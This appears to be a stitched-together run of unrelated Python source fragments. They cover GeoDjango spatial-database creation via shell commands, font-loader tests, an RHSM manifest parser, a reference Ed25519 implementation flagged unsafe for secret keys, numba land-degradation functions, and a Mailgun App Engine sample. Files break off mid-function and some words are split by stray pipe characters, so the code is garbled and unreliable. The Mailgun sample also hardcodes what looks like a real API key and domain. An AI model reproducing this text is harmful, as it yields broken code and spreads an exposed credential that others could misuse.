self.valueF15 = 1
self.valueF15Off = 0
self.componentF16 = "" # Function button
self.valueF16 = 1
self.valueF16Off = 0
self.componentF17 = "" # Function button
self.valueF17 = 1
self.valueF17Off = 0
self.componentF18 = "" # Function button
self.valueF18 = 1
self.valueF18Off = 0
self.componentF19 = "" # Function button
self.valueF19 = 1
self.valueF19Off = 0
self.componentF20 = "" # Function button
self.valueF20 = 1
self.valueF20Off = 0
self.componentF21 = "" # Function button
self.valueF21 = 1
self.valueF21Off = 0
self.componentF22 = "" # Function button
self.valueF22 = 1
self.valueF22Off = 0
self.componentF23 = "" # Function button
self.valueF23 = 1
self.valueF23Off = 0
self.componentF24 = "" # Function button
self.valueF24 = 1
self.valueF24Off = 0
self.componentF25 = "" # Function button
self.valueF25 = 1
self.valueF25Off = 0
self.componentF26 = "" # Function button
self.valueF26 = 1
self.valueF26Off = 0
self.componentF27 = "" # Function button
self.valueF27 = 1
self.valueF27Off = 0
self.componentF28 = "" # Function button
self.valueF28 = 1
self.valueF28Off = 0
self.componentF29 = "" # Function button
self.valueF29 = 1
self.valueF29Off = 0
|
the command-line options for the shell command
options = get_cmd_options(db_name)
# Constructing the 'createlang' command.
createlang_cmd = 'createlang %splpgsql' % options
if verbosity >= 1: print createlang_cmd
# Must have database super-user privileges to execute createlang -- it must
# also be in your path.
status, output = getstatusoutput(createlang_cmd)
# Checking the status of the command, 0 => execution successful
if status:
raise Exception("Error executing 'plpgsql' command: %s\n" % output)
def _create_with_cursor(db_name, verbosity=1, autoclobber=False):
"Creates database with psycopg2 cursor."
# Constructing the necessary SQL to create the database (the DATABASE_USER
# must possess the privileges to create a database)
create_sql = 'CREATE DATABASE %s' % connection.ops.quote_name(db_name)
if settings.DATABASE_USER:
create_sql += ' OWNER %s' % settings.DATABASE_USER
cursor = connection.cursor()
_set_autocommit(connection)
try:
# Trying to create the database first.
cursor.execute(create_sql)
#print create_sql
except Exception, e:
# Drop and recreate, if necessary.
if not autoclobber:
confirm = raw_input("\nIt appears the database, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % db_name)
if autoclobber or confirm == 'yes':
if verbosity >= 1: print 'Destroying old spatial database...'
drop_db(db_name)
if verbosity >= 1: print 'Creating new spatial database...'
cursor.execute(create_sql)
else:
raise Exception('Spatial Database Creation canceled.')
foo = _create_with_cursor
created_regex = re.compile(r'^createdb: database creation failed: ERROR: database ".+" already exists')
def _create_with_shell(db_name, verbosity=1, autoclobber=False):
"""
If no spatial database already exists, then using a cursor will not work.
Thus, a `createdb` command will be issued through the shell to bootstrap
creation of the spatial database.
"""
# Getting the command-line options for the shell command
options = get_cmd_options(False)
create_cmd = 'createdb -O %s %s%s' % (settings.DATABASE_USER, options, db_name)
if verbosity >= 1: print create_cmd
# Attempting to create the database.
status, output = getstatusoutput(create_cmd)
if status:
if created_regex.match(output):
if not autoclobber:
confirm = raw_input("\nIt appears the database, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % db_name)
if autoclobber or confirm == 'yes':
if verbosity >= 1: print 'Destroying old spatial database...'
drop_cmd = 'dropdb %s%s' % (options, db_name)
status, output = getstatusoutput(drop_cmd)
if status != 0:
raise Exception('Could not drop database %s: %s' % (db_name, output))
if verbosity >= 1: print 'Creating new spatial database...'
status, output = getstatusoutput(create_cmd)
if status != 0:
raise Exception('Could not create database after dropping: %s' % output)
else:
raise Exception('Spatial Database Creation canceled.')
else:
raise Exception('Unknown error occurred in creating database: %s' % output)
def create_spatial_db(test=False, verbosity=1, autoclobber=False, interactive=False):
"Creates a spatial database based on the settings."
# Making sure we're using PostgreSQL and psycopg2
if settings.DATABASE_ENGINE != 'postgresql_psycopg2':
raise Exception('Spatial database creation only supported postgresql_psycopg2 platform.')
# Getting the spatial database name
if test:
db_name = get_spatial_db(test=True)
_create_with_cursor(db_name, verbosity=verbosity, autoclobber=autoclobber)
else:
db_name = get_spatial_db()
_create_with_shell(db_name, verbosity=verbosity, autoclobber=autoclobber)
# Creating the db language, does not need to be done on NT platforms
# since the PostGIS installer enables this capability.
if os.name != 'nt':
create_lang(db_name, verbosity=verbosity)
# Now adding in the PostGIS routines.
load_postgis_sql(db_name, verbosity=verbosity)
if verbosity >= 1: print 'Creation of spatial database %s successful.' % db_name
# Closing the connection
connection.close()
settings.DATABASE_NAME = db_name
# Syncing the database
call_command('syncdb', verbosity=verbosity, interactive=interactive)
def drop_db(db_name=False, test=False):
"""
Drops the given database (defaults to what is returned from
get_spatial_db()). All exceptions are propagated up to the caller.
"""
if not db_name: db_name = get_spatial_db(test=test)
cursor = connection.cursor()
cursor.execute('DROP DATABASE %s' % connection.ops.quote_name(db_name))
def get_cmd_options(db_name):
"Obtains the command-line PostgreSQL connection options for shell commands."
# The db_name parameter is optional
options = ''
if db_name:
options += '-d %s ' % db_name
if settings.DATABASE_USER:
options += '-U %s ' % settings.DATABASE_USER
if settings.DATABASE_HOST:
options += '-h %s ' % settings.DATABASE_HOST
if settings.DATABASE_PORT:
options += '-p %s ' % settings.DATABASE_PORT
return options
def get_spatial_db(test=False):
"""
Returns the name of the spatial databa | se. The 'test' keyword may be set
to retur | n the test spatial database name.
"""
if test:
if settings.TEST_DATABASE_NAME:
test_db_name = settings.TEST_DATABASE_NAME
else:
test_db_name = TEST_DATABASE_PREFIX + settings.DATABASE_NAME
return test_db_name
else:
if not settings.DATABASE_NAME:
raise Exception('must configure DATABASE_NAME in settings.py')
return settings.DATABASE_NAME
def load_postgis_sql(db_name, verbosity=1):
"""
This routine loads up the PostGIS SQL files lwpostgis.sql and
spatial_ref_sys.sql.
"""
# Getting the path to the PostGIS SQL
try:
# POSTGIS_SQL_PATH may be placed in settings to tell GeoDjango where the
# PostGIS SQL files are located. This is especially useful on Win32
# platforms since the output of pg_config looks like "C:/PROGRA~1/..".
sql_path = settings.POSTGIS_SQL_PATH
except AttributeError:
status, sql_path = getstatusoutput('pg_config --sharedir')
if status:
sql_path = '/usr/local/share'
# The PostGIS SQL post-creation files.
lwpostgis_file = os.path.join(sql_path, 'lwpostgis.sql')
srefsys_file = os.path.join(sql_path, 'spatial_ref_sys.sql')
if not os.path.isfile(lwpostgis_file):
raise Exception('Could not find PostGIS function definitions in %s' % lwpostgis_file)
if not os.path.isfile(srefsys_file):
raise Exception('Could not find PostGIS spatial reference system definitions in %s' % srefsys_file)
# Getting the psql command-line options, and command format.
options = get_cmd_options(db_name)
cmd_fmt = 'psql %s-f "%%s"' % options
# Now trying to load up the PostGIS functions
cmd = cmd_fmt % lwpostgis_file
if verbosity >= 1: print cmd
status, output = getstatusoutput(cmd)
if status:
raise Exception('Error in loading PostGIS lwgeometry routines.')
# Now trying to load up the Spatial Reference System table
cmd = cmd_fmt % srefsys_file
if verbosity >= 1: print cmd
status, output = getstatusoutput(cmd)
if status:
raise Exception('Error in loading PostGIS spatial_ref_sys table.')
# Setting the permissions because on Windows platforms the owner
# of the spatial_ref_sys and geometry_columns tables is always
# the postgres user, regardless of how the db is created.
if os.name == 'nt': set_permissions(db_na |
import logging
import unittest
from functools import reduce
from ass_parser import StyleInfo, UsageData
from font_loader import TTFFont, FontInfo, FontLoader, TTCFont, FontWeight
from tests.common import get_file_in_test_directory
class FontLoaderTests(unittest.TestCase):
def test_returns_all_not_found_fonts(self):
loader = FontLoader(None, True)
data = {StyleInfo('Jorvik', 0, False) : UsageData(), StyleInfo('Random font', 0, False) : UsageData()}
found, not_found = loader.get_fonts_for_list(data)
self.assertEqual(2, len(not_found))
def test_returns_all_found_fonts(self):
loader = FontLoader([get_file_in_test_directory('')], True)
data = {StyleInfo('Jorvik Informal V2', 0, False) : UsageData(), StyleInfo('Random font', 0, False) : UsageData()}
found, not_found = loader.get_fonts_for_list(data)
self.assertEqual(1, len(found))
self.assertIn('Jorvik Informal V2', list(found.values())[0].names)
def test_performs_case_insensitive_search(self):
loader = FontLoader([get_file_in_test_directory('')], True)
data = {StyleInfo('JoRvIk INFormAl v2', 0, False) : UsageData()}
found, not_found = loader.get_fonts_for_list(data)
self.assertEqual(1, len(found))
def test_does_not_add_same_font_twice(self):
loader = FontLoader([get_file_in_test_directory(''), get_file_in_test_directory('')], True)
data = {StyleInfo('Jorvik', 0, False) : UsageData(), StyleInfo('Jorvik informal', 0, False) : UsageData()}
found, not_found = loader.get_fonts_for_list(data)
self.assertEqual(1, len(found))
def test_loads_at_least_some_system_fonts(self):
loader = FontLoader(None, True)
self.assertTrue(len(loader.fonts) > 0)
def test_finds_all_required_fonts(self):
loader = FontLoader(None, True)
loader.fonts.append(FontInfo(['Arial'], False, False, FontWeight.FW_NORMAL, 'random', '1'))
loader.fonts.append(FontInfo(['Arial Black'], False, False, FontWeight.FW_NORMAL, 'random', '2'))
data = {StyleInfo('Arial', 0, False) : UsageData(), StyleInfo('Arial Black', 0, False) : UsageData()}
found, not_found = loader.get_fonts_for_list(data)
self.assertEqual(2, len(found))
def test_returns_only_appropriate_font(self):
loader = FontLoader(None, True)
loader.fonts.append(FontInfo(['Arial'], False, False, FontWeight.FW_NORMAL, 'random', '1'))
loader.fonts.append(FontInfo(['Arial Black'], False, False, FontWeight.FW_NORMAL, 'random', '2'))
data = {StyleInfo('Arial', 0, False) : UsageData()}
found, not_found = loader.get_fonts_for_list(data)
self.assertEqual(1, len(found))
class TTFFontTests(unittest.TestCase):
def test_ttf_name_matches(self):
font = TTFFont(get_file_in_test_directory('seriously.ttf'))
self.assertIn('Seriously', font.get_info().names)
def test_otf_name_matches(self):
font = TTFFont(get_file_in_test_directory('otfpoc.otf'))
self.assertIn('otfpoc', font.get_info().names)
def test_jorvik_v2_name_matches(self):
font = TTFFont(get_file_in_test_directory('Jorvik.ttf'))
self.assertIn('Jorvik Informal V2', font.get_info().names)
def test_detects_italic_only_font(self):
font = TTFFont(get_file_in_test_directory('CaviarDreams_Italic.ttf'))
self.assertIs(font.get_info().italic, True)
def test_detects_bold_only_font(self):
font = TTFFont(get_file_in_test_directory('Caviar Dreams Bold.ttf'))
self.assertIs(font.get_info().bold, True)
def test_detects_italic_bold_font(self):
font = TTFFont(get_file_in_test_directory('Ca | viarDreams_BoldItalic.ttf'))
self.assertIs(font.get_info().italic, True)
self.assertIs(font.get_info().bold, True)
def test_parses_fonts_with_platform_id_2_strings(self):
font = TTFFont(get_file_in_test_directory('VANTATHI.TTF'))
self.assertIn('Vanta Thin', font.get_info().names)
def test_parses_fonts_with_utf8_platform_id_0_strings(self):
font = TTFFont(get_file_in_test_directory('SUSANNA_.otf'))
| self.assertIn('Susanna', font.get_info().names)
def test_detects_bold_weight(self):
font = TTFFont(get_file_in_test_directory('Caviar Dreams Bold.ttf'))
self.assertEqual(font.get_info().weight, FontWeight.FW_BOLD)
def test_detects_regular_weight(self):
font = TTFFont(get_file_in_test_directory('Jorvik.ttf'))
self.assertEqual(font.get_info().weight, FontWeight.FW_NORMAL)
def test_detects_medium_weight(self):
font = TTFFont(get_file_in_test_directory('seriously.ttf'))
self.assertEqual(font.get_info().weight, FontWeight.FW_MEDIUM)
class TTCFontTests(unittest.TestCase):
def test_contains_all_names(self):
font = TTCFont(get_file_in_test_directory('jorvik_and_seriously.ttc'))
self.assertIn('Seriously', reduce(lambda names, info: names + info.names, font.get_infos(), []))
self.assertIn('Jorvik Informal V2', reduce(lambda names, info: names + info.names, font.get_infos(), []))
class FontInfoTests(unittest.TestCase):
def test_calculates_md5_on_access(self):
info = FontInfo([], False, False, 0, get_file_in_test_directory('Jorvik.ttf'), None)
self.assertIsNotNone(info.md5)
def test_calculates_correct_md5(self):
info = FontInfo([], False, False, 0, get_file_in_test_directory('Jorvik.ttf'), None)
self.assertEqual(info.md5, '0dae05c47e919281d7ac1e0170e4d3a8')
def test_caches_md5_in_private_field(self):
info = FontInfo([], False, False, 0, get_file_in_test_directory('Jorvik.ttf'), None)
self.assertIsNone(info._FontInfo__md5)
md5 = info.md5
self.assertIsNotNone(info._FontInfo__md5)
|
see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import cStringIO
import json
import zipfile
import os
from M2Crypto import X509
import constants
class Manifest(object):
"""Class containing relevant data from RHSM manifest."""
SIGNATURE_NAME = "signature"
INNER_ZIP_NAME = "consumer_export.zip"
ENTITLEMENTS_PATH = "export/entitlements"
CERTIFICATE_PATH = "export/extensions"
PRODUCTS_PATH = "export/products"
def __init__(self, zip_path):
self.all_entitlements = []
self.manifest_repos = {}
self.sat5_certificate = None
# Signature and signed data
self.signature = None
self.data = None
# Open manifest from path
top_zip = None
inner_zip = None
inner_file = None
try:
top_zip = zipfile.ZipFile(zip_path, 'r')
# Fetch inner zip file into memory
try:
# inner_file = top_zip.open(zip_path.split('.zip')[0] + '/' + self.INNER_ZIP_NAME)
inner_file = top_zip.open(self.INNER_ZIP_NAME)
self.data = inner_file.read()
inner_file_data = cStringIO.StringIO(self.data)
signature_file = top_zip.open(self.SIGNATURE_NAME)
self.signature = signature_file.read()
# Open the inner zip file
try:
inner_zip = zipfile.ZipFile(inner_file_data)
self._load_entitlements(inner_zip)
self._extract_certificate(inner_zip)
finally:
if inner_zip is not None:
inner_zip.close()
finally:
if inner_file is not None:
inner_file.close()
finally:
if top_zip is not None:
top_zip.close()
def _extract_certificate(self, zip_file):
files = zip_file.namelist()
certificates_names = []
for f in files:
if f.startswith(self.CERTIFICATE_PATH) and f.endswith(".xml"):
certificates_names.append(f)
if len(certificates_names) >= 1:
# take only first file
cert_file = zip_file.open(certificates_names[0]) # take only first file
self.sat5_certificate = cert_file.read().strip()
cert_file.close()
else:
raise MissingSatelliteCertificateError("Satellite Certificate was not found in manifest.")
def _fill_product_repositories(self, zip_file, product):
product_file = zip_file.open(self.PRODUCTS_PATH + '/' + str(product.get_id()) + '.json')
product_data = json.load(product_file)
product_file.close()
try:
for content in product_data['productContent']:
content = content['content']
product.add_repository(content['label'], content['contentUrl'])
except KeyError:
print("ERROR: Cannot access required field in product '%s'" % product.get_id())
raise
def _load_entitlements(self, zip_file):
files = zip_file.namelist()
entitlements_files = []
for f in files:
if f.startswith(self.ENTITLEMENTS_PATH) and f.endswith(".json"):
entitlements_files.append(f)
if len(entitlements_files) >= 1:
self.all_entitlements = []
for entitlement_file in entitlements_files:
entitlements = zip_file.open(entitlement_file)
# try block in try block - this is hack for python 2.4 compatibility
# to support finally
try:
try:
data = json.load(entitlements)
# Extract credentials
certs = data['certificates']
if len(certs) != 1:
raise IncorrectEntitlementsFileFormatError(
"ERROR: Single certificate in entitlements file is expected, found: %d"
% len(certs))
cert = certs[0]
credentials = Credentials(data['id'], cert['cert'], cert['key'])
# Extract product IDs
products = []
provided_products = data['pool']['providedProducts']
for provided_product in provided_products:
product = Product(provided_product['productId'])
self._fill_product_repositories(zip_file, product)
products.append(product)
# Skip entitlements not providing any products
if products:
entitlement = Entitlement(products, credentials)
self.all_entitlements.app | end(entitlement)
except KeyError:
print("ERROR: Cannot access required field in file '%s'" % entitlement_file)
raise
finally:
entitlements.close()
else:
raise IncorrectEntitlementsFileFormatError(
"ERROR: There has to be at least one entitlements file")
def get_all_entitlements(self):
re | turn self.all_entitlements
def get_satellite_certificate(self):
return self.sat5_certificate
def check_signature(self):
if self.signature and self.data:
certs = os.listdir(constants.CANDLEPIN_CA_CERT_DIR)
# At least one certificate has to match
for cert_name in certs:
cert_file = None
try:
cert_file = open(constants.CANDLEPIN_CA_CERT_DIR + '/' + cert_name, 'r')
cert = X509.load_cert_string(cert_file.read())
except (IOError, X509.X509Error):
continue
finally:
if cert_file is not None:
cert_file.close()
pubkey = cert.get_pubkey()
pubkey.reset_context(md='sha256')
pubkey.verify_init()
pubkey.verify_update(self.data)
if pubkey.verify_final(self.signature):
return True
return False
class Entitlement(object):
def __init__(self, products, credentials):
if products and credentials:
self.products = products
self.credentials = credentials
else:
raise IncorrectEntitlementError()
def get_products(self):
return self.products
def get_credentials(self):
return self.credentials
class Credentials(object):
def __init__(self, identifier, cert, key):
if identifier:
self.id = identifier
else:
raise IncorrectCredentialsError(
"ERROR: ID of credentials has to be defined"
)
if cert and key:
self.cert = cert
self.key = key
else:
raise IncorrectCredentialsError(
"ERROR: Trying to create object with cert = %s and key = %s"
% (cert, key)
)
def get_id(self):
return self.id
def get_cert(self):
return self.cert
def get_key(self):
return self.key
class Product(object):
def __init__(self, identifier):
try:
self.id = int(identifier)
except ValueError:
raise IncorrectProductError(
"ERROR: Invalid product id: %s" % identifier
)
self.repositories = {}
def get_id(self):
return self.id
def get_repositories(self):
return self.repositories
def add_repository(self, label, url):
self.repositories[label] = url
class IncorrectProductError(Exception):
pass
class IncorrectEntitlementError(Exception):
|
# ed25519.py - Optimized version of the reference implementation of Ed25519
#
# Written in 2011? by Daniel J. Bernstein <djb@cr.yp.to>
# 2013 by Donald Stufft <donald@stufft.io>
# 2013 by Alex Gaynor <alex.gaynor@gmail.com>
# 2013 by Greg Price <price@mit.edu>
#
# To the extent possible under law, the author(s) have dedicated all copyright
# and related and neighboring rights to this software to the public domain
# worldwide. This software is distributed without any warranty.
#
# You should have received a copy of the CC0 Public Domain Dedication along
# with this software. If not, see
# <http://creativecommons.org/publicdomain/zero/1.0/>.
"""
NB: This code is not safe for use with secret keys or secret data.
The only safe use of this code is for verifying signatures on public messages.
Functions for computing the public key of a secret key and for signing
a message are included, namely publickey_unsafe and signature_unsafe,
for testing purposes only.
The root of the problem is that Python's long-integer arithmetic is
not designed for use in cryptography. Specifically, it may take more
or less time to execute an operation depending on the values of the
inputs, and its memory access patterns may also depend on the inputs.
This opens it to timing and cache side-channel attacks which can
disclose data to an attacker. We rely on Python's long-integer
arithmetic, so we cannot handle secrets without risking their disclosure.
"""
import hashlib
import operator
import sys
__version__ = "1.0.dev0"
# Useful for very coarse version differentiation.
PY3 = sys.version_info[0] == 3
if PY3:
indexbytes = operator.getitem
intlist2bytes = bytes
int2byte = operator.methodcaller("to_bytes", 1, "big")
else:
int2byte = chr
range = xrange
def indexbytes(buf, i):
return ord(buf[i])
def intlist2bytes(l):
return b"".join(chr(c) for c in l)
b = 256
q = 2 ** 255 - 19
l = 2 ** 252 + 27742317777372353535851937790883648493
def H(m):
return hashlib.sha512(m).digest()
def pow2(x, p):
"""== pow(x, 2**p, q)"""
while p > 0:
x = x * x % q
p -= 1
return x
def inv(z):
"""$= z^{-1} \mod q$, for z != 0"""
# Adapted from curve25519_athlon.c in djb's Curve25519.
z2 = z * z % q # 2
z9 = pow2(z2, 2) * z % q # 9
z11 = z9 * z2 % q # 11
z2_5_0 = (z11 * z11) % q * z9 % q # 31 == 2^5 - 2^0
z2_10_0 = pow2(z2_5_0, 5) * z2_5_0 % q # 2^10 - 2^0
z2_20_0 = pow2(z2_10_0, 10) * z2_10_0 % q # ...
z2_40_0 = pow2(z2_20_0, 20) * z2_20_0 % q
z2_50_0 = pow2(z2_40_0, 10) * z2_10_0 % q
z2_100_0 = pow2(z2_50_0, 50) * z2_50_0 % q
z2_200_0 = pow2(z2_100_0, 100) * z2_100_0 % q
z2_250_0 = pow2(z2_200_0, 50) * z2_50_0 % q # 2^250 - 2^0
return pow2(z2_250_0, 5) * z11 % q # 2^255 - 2^5 + 11 = q - 2
d = -121665 * inv(121666) % q
I = pow(2, (q - 1) // 4, q)
def xrecover(y):
xx = (y * y - 1) * inv(d * y * y + 1)
x = pow(xx, (q + 3) // 8, q)
if (x * x - xx) % q != 0:
x = (x * I) % q
if x % 2 != 0:
x = q-x
return x
By = 4 * inv(5)
Bx = xrecover(By)
B = (Bx % q, By % q, 1, (Bx * By) % q)
ident = (0, 1, 1, 0)
def edwards_add(P, Q):
# This is formula sequence 'addition-add-2008-hwcd-3' from
# http://www.hyperelliptic.org/EFD/g1p/auto-twisted-extended-1.html
(x1, y1, z1, t1) = P
(x2, y2, z2, t2) = Q
a = (y1-x1)*(y2-x2) % q
b = (y1+x1)*(y2+x2) % q
c = t1*2*d*t2 % q
dd = z1*2*z2 % q
e = b - a
f = dd - c
g = dd + c
h = b + a
x3 = e*f
y3 = g*h
t3 = e*h
z3 = f*g
return (x3 % q, y3 % q, z3 % q, t3 % q)
def edwards_double(P):
# This is formula sequence 'dbl-2008-hwcd' from
# http://www.hyperelliptic.org/EFD/g1p/auto-twisted-extended-1.html
(x1, y1, z1, t1) = P
a = x1*x1 % q
b = y1*y1 % q
c = 2*z1*z1 % q
# dd = -a
e = ((x1+y1)*(x1+y1) - a - b) % q
g = -a + b # dd + b
f = g - c
h = -a - b # dd - b
x3 = e*f
y3 = g*h
t3 = e*h
z3 = f*g
return (x3 % q, y3 % q, z3 % q, t3 % q)
def scalarmult(P, e):
if e == 0:
return ident
Q = scalarmult(P, e // 2)
Q = edwards_double(Q)
if e & 1:
Q = edwards_add(Q, P)
return Q
# Bpow[i] == scalarmult(B, 2**i)
Bpow = []
def make_Bpow():
P = B
for i in range(253):
Bpow.append(P)
P = edwards_double(P)
make_Bpow()
def scalarmult_B(e):
"""
Implements scalarmult(B, e) more efficiently.
"""
# scalarmult(B, l) is the identity
e = e % l
P = ident
for i in range(253):
if e & 1:
P = edwards_add(P, Bpow[i])
e = e // 2
assert e == 0, e
return P
def encodeint(y):
bits = [(y >> i) & 1 for i in range(b)]
return b''.join([
int2byte(sum([bits[i * 8 + j] << j for j in range(8)]))
for i in range(b//8)
])
def encodepoint(P):
(x, y, z, t) = P
zi = inv(z)
x = (x * zi) % q
y = (y * zi) % q
bits = [(y >> i) & 1 for i in range(b - 1)] + [x & 1]
return b''.join([
int2byte(sum([bits[i * 8 + j] << j for j in range(8)]))
for i in range(b // 8)
])
def bit(h, i):
return (indexbytes(h, i // 8) >> (i % 8)) & 1
def publickey_unsafe(sk):
| """
Not safe to use with secret keys or secret data.
See module docstring. This function should be used for testing only.
"""
h = H(sk)
a = 2 ** (b - 2) + sum(2 ** i * bit(h, i) for i in range(3, b - 2))
A = scalarmult_B(a)
return encodepoint(A)
def Hint(m):
h = H(m)
return sum(2 ** i * | bit(h, i) for i in range(2 * b))
def signature_unsafe(m, sk, pk):
"""
Not safe to use with secret keys or secret data.
See module docstring. This function should be used for testing only.
"""
h = H(sk)
a = 2 ** (b - 2) + sum(2 ** i * bit(h, i) for i in range(3, b - 2))
r = Hint(
intlist2bytes([indexbytes(h, j) for j in range(b // 8, b // 4)]) + m
)
R = scalarmult_B(r)
S = (r + Hint(encodepoint(R) + pk + m) * a) % l
return encodepoint(R) + encodeint(S)
def isoncurve(P):
(x, y, z, t) = P
return (z % q != 0 and
x*y % q == z*t % q and
(y*y - x*x - z*z - d*t*t) % q == 0)
def decodeint(s):
return sum(2 ** i * bit(s, i) for i in range(0, b))
def decodepoint(s):
y = sum(2 ** i * bit(s, i) for i in range(0, b - 1))
x = xrecover(y)
if x & 1 != bit(s, b-1):
x = q - x
P = (x, y, 1, (x*y) % q)
if not isoncurve(P):
raise ValueError("decoding point that is not on curve")
return P
class SignatureMismatch(Exception):
pass
def checkvalid(s, m, pk):
"""
Not safe to use when any argument is secret.
See module docstring. This function should be used only for
verifying public signatures of public messages.
"""
if len(s) != b // 4:
raise ValueError("signature length is wrong")
if len(pk) != b // 8:
raise ValueError("public-key length is wrong")
R = decodepoint(s[:b // 8])
A = decodepoint(pk)
S = decodeint(s[b // 8:b // 4])
h = Hint(encodepoint(R) + pk + m)
(x1, y1, z1, t1) = P = scalarmult_B(S)
(x2, y2, z2, t2) = Q = edwards_add(R, scalarmult(A, h))
if (not isoncurve(P) or not isoncurve(Q) or
(x1*z2 - x2*z1) % q != 0 or (y1*z2 - y2*z1) % q != 0):
raise SignatureMismatch("signature does not pass verification")
|
import os
import json
import numpy as np
try:
from numba.pycc import CC
cc = CC('calculate_numba')
except ImportError:
# Will use these as regular Python functions if numba is not present.
class CCSubstitute(object):
# Make a cc.export that doesn't do anything
def export(*args, **kwargs):
def wrapper(func):
return func
return wrapper
cc = CCSubstitute()
@cc.export('ldn_recode_traj', 'i2[:,:](i2[:,:])')
def ldn_recode_traj(x) | :
# Recode trajectory into deg, stable, imp. Capture trends that are at least
# 95% significant.
#
# Remember that traj is coded as:
# -3: 99% signif decline
# -2: 95% signif decline
# -1: 90% signif decline
# 0: stable
# 1: 90% signif increase
# 2: 95% signif increase
# 3: 99% signif increase
shp = x.shape
x = x.ravel()
x[(x >= -1) & (x <= 1)] = 0
x[(x >= -3) & (x < -1)] = -1
# -1 and 1 are not signif at 95%, so stab | le
x[(x > 1) & (x <= 3)] = 1
return(np.reshape(x, shp))
@cc.export('ldn_recode_state', 'i2[:,:](i2[:,:])')
def ldn_recode_state(x):
# Recode state into deg, stable, imp. Note the >= -10 is so no data
# isn't coded as degradation. More than two changes in class is defined
# as degradation in state.
shp = x.shape
x = x.ravel()
x[(x > -2) & (x < 2)] = 0
x[(x >= -10) & (x <= -2)] = -1
x[x >= 2] = 1
return(np.reshape(x, shp))
@cc.export('ldn_make_prod5', 'i2[:,:](i2[:,:], i2[:,:], i2[:,:] ,i2[:,:])')
def ldn_make_prod5(traj, state, perf, mask):
# Coding of LPD (prod5)
# 1: declining
# 2: early signs of decline
# 3: stable but stressed
# 4: stable
# 5: improving
# -32768: no data
# Declining = 1
shp = traj.shape
traj = traj.ravel()
state = state.ravel()
perf = perf.ravel()
mask = mask.ravel()
x = traj.copy()
x[traj == -1] = 1
# Stable = 4
x[traj == 0] = 4
# Improving = 5
x[traj == 1] = 5
# Stable due to agreement in perf and state but positive trajectory
x[(traj == 1) & (state == -1) & (perf == -1)] = 4
# Stable but stressed
x[(traj == 0) & (state == 0) & (perf == -1)] = 3
# Early signs of decline
x[(traj == 0) & (state == -1) & (perf == 0)] = 2
# Ensure NAs carry over to productivity indicator layer
x[(traj == -32768) | (perf == -32768) | (state == -32768)] = -32768
# Ensure masked areas carry over to productivity indicator
x[mask == -32767] = -32767
return(np.reshape(x, shp))
@cc.export('ldn_total_by_trans', '(f4[:,:], i2[:,:], f4[:,:])')
def ldn_total_by_trans(d, trans_a, cell_areas):
"""Calculates a total table for an array"""
d = d.ravel()
trans_a = trans_a.ravel()
trans = np.unique(trans_a)
cell_areas = cell_areas.ravel()
# Values less than zero are missing data flags
d[d < 0] = 0
totals = np.zeros(trans.size, dtype=np.float32)
for i in range(trans.size):
# Only sum values for this_trans, and where soc has a valid value
# (negative values are missing data flags)
vals = d[trans_a == trans[i]] * cell_areas[trans_a == trans[i]]
totals[i] += np.sum(vals)
return trans, totals
# @cc.export('ldn_total_by_trans_merge', '(f4[:], i2[:], f4[:], i2[:])')
# def ldn_total_by_trans_merge(total1, trans1, total2, trans2):
# """Calculates a total table for an array"""
# # Combine past totals with these totals
# trans = np.unique(np.concatenate((trans1, trans2)))
# totals = np.zeros(trans.size, dtype=np.float32)
# for i in range(trans.size):
# trans1_loc = np.where(trans1 == trans[i])[0]
# trans2_loc = np.where(trans2 == trans[i])[0]
# if trans1_loc.size > 0:
# totals[i] = totals[i] + total1[trans1_loc[0]]
# if trans2_loc.size > 0:
# totals[i] = totals[i] + total2[trans2_loc[0]]
# return trans, totals
@cc.export('ldn_total_deg', 'f4[4](i2[:,:], b1[:,:], f4[:,:])')
def ldn_total_deg(x, water, cell_areas):
"""Calculates a total table for an array"""
x = x.ravel()
cell_areas = cell_areas.ravel()
x[water.ravel()] = -32767
out = np.zeros((4), dtype=np.float32)
out[0] = np.sum(cell_areas[x == 1])
out[1] = np.sum(cell_areas[x == 0])
out[2] = np.sum(cell_areas[x == -1])
out[3] = np.sum(cell_areas[x == -32768])
return out
if __name__ == "__main__":
cc.compile()
|
#!/usr/bin/env python
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License | , Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permission | s and
# limitations under the License.
"""
Sample Google App Engine application that demonstrates how to send mail using
Mailgun.
For more information, see README.md.
"""
from urllib import urlencode
import httplib2
import webapp2
# Your Mailgun Domain Name
MAILGUN_DOMAIN_NAME = 'isrealconsulting.com'
# Your Mailgun API key
MAILGUN_API_KEY = 'key-1ffd59a9c3afdcf762f22b21129c13f6'
# [START simple_message]
def send_simple_message(recipient):
http = httplib2.Http()
http.add_credentials('api', MAILGUN_API_KEY)
url = 'https://api.mailgun.net/v3/{}/messages'.format(MAILGUN_DOMAIN_NAME)
data = {
'from': 'Isreal Consulting Webmaster <webmaster@{}>'.format(MAILGUN_DOMAIN_NAME),
'to': recipient,
'subject': 'This is an example email from ICLLC code site codepy',
'text': 'Test message from codepy-1'
}
resp, content = http.request(url, 'POST', urlencode(data))
if resp.status != 200:
raise RuntimeError(
'Mailgun API error: {} {}'.format(resp.status, content))
# [END simple_message]
# [START complex_message]
def send_complex_message(recipient):
http = httplib2.Http()
http.add_credentials('api', MAILGUN_API_KEY)
url = 'https://api.mailgun.net/v3/{}/messages'.format(MAILGUN_DOMAIN_NAME)
data = {
'from': 'Isreal Consulting Webmaster <webmaster@{}>'.format(MAILGUN_DOMAIN_NAME),
'to': recipient,
'subject': 'This is an example email from ICLLC code site codepy',
'text': 'Test message from codepy-1',
'html': '<html>HTML <strong>version</strong> of the body</html>'
}
resp, content = http.request(url, 'POST', urlencode(data))
if resp.status != 200:
raise RuntimeError(
'Mailgun API error: {} {}'.format(resp.status, content))
# [END complex_message]
class MainPage(webapp2.RequestHandler):
def get(self):
self.response.content_type = 'text/html'
self.response.write("""
<!doctype html>
<html><head><title>Isreal Consulting</title></head>
<body>
<form method="POST">
